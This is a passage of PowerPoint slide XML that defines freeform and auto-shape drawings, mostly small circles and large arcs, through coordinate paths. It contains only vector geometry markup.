                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8103" y="1411180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14319" y="1458285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20637" y="1495422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537225" y="1495422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525739" y="1455015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515722" y="1409344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508457" y="1362696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504033" y="1315160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502539" y="1266825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504033" y="1218489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508457" y="1170953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515722" y="1124305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525739" y="1078634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="538418" y="1034032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553671" y="990586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571408" y="948387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="591541" y="907524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613981" y="868087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638639" y="830164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665425" y="793847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="694250" y="759224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725027" y="726384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757665" y="695418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="792075" y="666414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828169" y="639463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865858" y="614653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="905052" y="592075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="945663" y="571818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="987601" y="553972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1030778" y="538625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075104" y="525868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120491" y="515790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1166850" y="508481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1214091" y="504029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1262126" y="502526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="502526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="3300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310532" y="914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1262126" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1352550" h="1495425">
                <a:moveTo>
                  <a:pt x="1352550" y="502526"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1262126" y="502526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310146" y="504029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="508026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="502526"/>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9" name="AutoShape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="49339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0" name="Freeform 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="4933950"/>
            <a:ext cx="57150" cy="66675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="66675">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17466" y="2627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="9779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="20359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="46261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="56880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17466" y="64045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="66675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="64045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="56880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="46261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="33274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="20359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="9779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683"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1" name="AutoShape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="49339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2" name="AutoShape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="49339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3" name="Freeform 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="5181600"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33400" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20413" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9794" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2629" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2629" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9794" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20413" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33400" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56896" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64047" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66675" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64047" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56896" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3340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4" name="Freeform 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="5181600"/>
            <a:ext cx="57150" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="57150">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17466" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17466" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="2250"/>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5" name="Freeform 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="5181600"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33400" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20413" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9794" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2629" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2629" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9794" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20413" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33400" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56896" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64047" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66675" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64047" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56896" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3340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6" name="Freeform 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="5181600"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33400" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20413" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9794" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2629" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2629" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9794" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20413" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33400" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56896" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64047" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66675" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64047" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56896" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3340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7" name="AutoShape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="5419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8" name="Freeform 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="5419725"/>
            <a:ext cx="57150" cy="66675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="66675">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17466" y="2629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="9794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="20413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="46315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="56896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17466" y="64047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="66675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="64047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="56896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="46315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="33400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="20413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="9794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="262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9" name="AutoShape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="5419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0" name="AutoShape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="5419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1" name="AutoShape 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="566737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2" name="Freeform 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="5667375"/>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3" name="AutoShape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="566737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4" name="AutoShape 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="566737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5" name="AutoShape 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="587692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6" name="Freeform 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="5876925"/>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7" name="AutoShape 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="587692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8" name="AutoShape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="587692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9" name="AutoShape 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="61150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0" name="Freeform 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="6115050"/>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1" name="AutoShape 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="61150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2" name="AutoShape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="61150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3" name="AutoShape 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="636270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4" name="Freeform 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="6362700"/>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5" name="AutoShape 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="636270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6" name="AutoShape 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="636270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7" name="AutoShape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11420475" y="66103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8" name="Freeform 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="6610350"/>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9" name="AutoShape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="66103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0" name="AutoShape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11744325" y="66103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1" name="Freeform 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11325225" y="1866900"/>
            <a:ext cx="866775" cy="1733550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="866775" h="1733550">
                <a:moveTo>
                  <a:pt x="866775" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="819221" y="1282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="772337" y="5086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726190" y="11345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680844" y="19993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636367" y="30965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592823" y="44192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550281" y="59611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508804" y="77154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="468461" y="96756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429316" y="118349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391436" y="141869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354887" y="167249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319736" y="194423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286047" y="223325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253888" y="253888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223325" y="286047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194423" y="319736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167249" y="354887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141869" y="391436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="429316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96756" y="468461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77154" y="508804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59611" y="550281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44192" y="592823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30965" y="636367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19993" y="680844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11345" y="726190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5086" y="772337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="819221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="866775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="914328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5086" y="961212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11345" y="1007359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19993" y="1052705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30965" y="1097182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44192" y="1140726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59611" y="1183268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77154" y="1224745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96756" y="1265088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="1304233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141869" y="1342113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167249" y="1378662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194423" y="1413813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223325" y="1447502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253888" y="1479661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286047" y="1510224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319736" y="1539126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354887" y="1566300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391436" y="1591680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429316" y="1615200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="468461" y="1636793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508804" y="1656395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550281" y="1673938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592823" y="1689357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636367" y="1702584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680844" y="1713556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726190" y="1722204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="772337" y="1728463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="819221" y="1732267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866775" y="1733550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866775"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82" name="Freeform 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11015726" y="471927"/>
            <a:ext cx="1176655" cy="1195070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1176654" h="1195070">
                <a:moveTo>
                  <a:pt x="0" y="1194947"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="949" y="1146873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="1099280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="1052205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="1005683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="959750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="914442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="869794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="825841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="782621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="740168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="698518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="657707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="617771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="578745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="540665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="503567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="467486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="432458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="398519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="365705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="334051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="303593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="274366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="246408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="219752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="194435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="170492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="147960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658083" y="126874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="107269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740544" y="89182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782997" y="72648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826218" y="57703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870170" y="44382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914818" y="32722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="960126" y="22757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1006059" y="14524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1052581" y="8059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1099656" y="3396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1147249" y="573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1176274"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83" name="Freeform 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11015726" y="1666875"/>
            <a:ext cx="1176655" cy="1195070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1176654" h="1195070">
                <a:moveTo>
                  <a:pt x="1176274" y="1195074"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1099656" y="1191677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1052581" y="1187013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1006059" y="1180546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="960126" y="1172312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914818" y="1162345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870170" y="1150682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826218" y="1137358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782997" y="1122410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740544" y="1105873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="1087782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658083" y="1068174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="1047084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="1024547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="1000601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="975279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="948619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="920655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="891425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="860962"/>
                </a:lnTo>
                <a:lnTo>
